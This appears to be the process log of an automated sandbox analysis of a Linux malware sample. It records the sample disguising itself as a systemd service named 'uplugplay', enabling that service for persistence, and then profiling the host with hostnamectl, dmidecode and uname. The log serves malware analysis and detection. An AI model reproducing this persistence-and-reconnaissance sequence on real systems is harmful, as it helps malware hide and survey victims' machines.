                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:04
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pgrep upnpsetup"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:04
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:04
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pgrep
                                                              Arguments:pgrep upnpsetup
                                                              File size:30968 bytes
                                                              MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                              Start time (UTC):09:28:06
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:06
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "pidof upnpsetup"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:06
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:06
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/pidof
                                                              Arguments:pidof upnpsetup
                                                              File size:27016 bytes
                                                              MD5 hash:f58f67968fc50f1497f9ea9e9c22b6e8

                                                              Start time (UTC):09:28:09
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:09
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "systemctl daemon-reload"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:09
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:09
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl daemon-reload
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):09:28:10
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:10
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "systemctl enable uplugplay.service"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:10
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:10
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl enable uplugplay.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/tmp/na.elf
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "systemctl start uplugplay.service"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/systemctl
                                                              Arguments:systemctl start uplugplay.service
                                                              File size:996584 bytes
                                                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                              Start time (UTC):09:28:09
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:28:09
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File size:22760 bytes
                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File size:22760 bytes
                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:28:11
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:/usr/sbin/uplugplay
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "/usr/sbin/uplugplay -Dcomsvc"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:/usr/sbin/uplugplay -Dcomsvc
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c hostnamectl
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:12
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/hostnamectl
                                                              Arguments:hostnamectl
                                                              File size:26848 bytes
                                                              MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c hostnamectl
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/hostnamectl
                                                              Arguments:hostnamectl
                                                              File size:26848 bytes
                                                              MD5 hash:b1245aa6d3c28b5d5fedb2d681d32eb9

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "dmidecode --type baseboard"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/dmidecode
                                                              Arguments:dmidecode --type baseboard
                                                              File size:121856 bytes
                                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c uptime
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uptime
                                                              Arguments:uptime
                                                              File size:14568 bytes
                                                              MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                              Start time (UTC):09:28:15
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:15
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c dmidecode
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:15
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:15
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/dmidecode
                                                              Arguments:dmidecode
                                                              File size:121856 bytes
                                                              MD5 hash:37284ba29446fb2dadf1ce80f8139c1a

                                                              Start time (UTC):09:28:16
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:16
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "uname -a"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uname
                                                              Arguments:uname -a
                                                              File size:39288 bytes
                                                              MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c uptime
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uptime
                                                              Arguments:uptime
                                                              File size:14568 bytes
                                                              MD5 hash:3ad70d8e33316ac713bf25c2ddf2fb14

                                                              Start time (UTC):09:28:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/sbin/uplugplay
                                                              Arguments:-
                                                              File size:435932 bytes
                                                              MD5 hash:eccb01bcdff87829f8e499f453ad4629

                                                              Start time (UTC):09:28:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:sh -c "uname -a"
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/bin/sh
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:18
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/uname
                                                              Arguments:uname -a
                                                              File size:39288 bytes
                                                              MD5 hash:4ac7c634c5bec95753c480e9d421dcc2

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/lib/systemd/systemd
                                                              Arguments:-
                                                              File size:1620224 bytes
                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/lib/systemd/systemd-hostnamed
                                                              Arguments:/lib/systemd/systemd-hostnamed
                                                              File size:35040 bytes
                                                              MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:28:13
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:/usr/bin/gpg --version
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:28:14
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:28:15
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:28:15
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/libexec/fwupd/fwupd
                                                              Arguments:-
                                                              File size:260616 bytes
                                                              MD5 hash:9baeed1d7c56e92aea5277bdf8b4373f

                                                              Start time (UTC):09:28:17
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/gpg
                                                              Arguments:gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
                                                              File size:1066992 bytes
                                                              MD5 hash:3c2e7402cc788b3a878a1d2bea56afbf

                                                              Start time (UTC):09:28:30
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:30
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.wGWDQF8lGk /tmp/tmp.fcWJ0ImgwV /tmp/tmp.Llo4sBnTUT
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                              Start time (UTC):09:28:30
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/dash
                                                              Arguments:-
                                                              File size:129816 bytes
                                                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                              Start time (UTC):09:28:30
                                                              Start date (UTC):31/03/2025
                                                              Path:/usr/bin/rm
                                                              Arguments:rm -f /tmp/tmp.wGWDQF8lGk /tmp/tmp.fcWJ0ImgwV /tmp/tmp.Llo4sBnTUT
                                                              File size:72056 bytes
                                                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b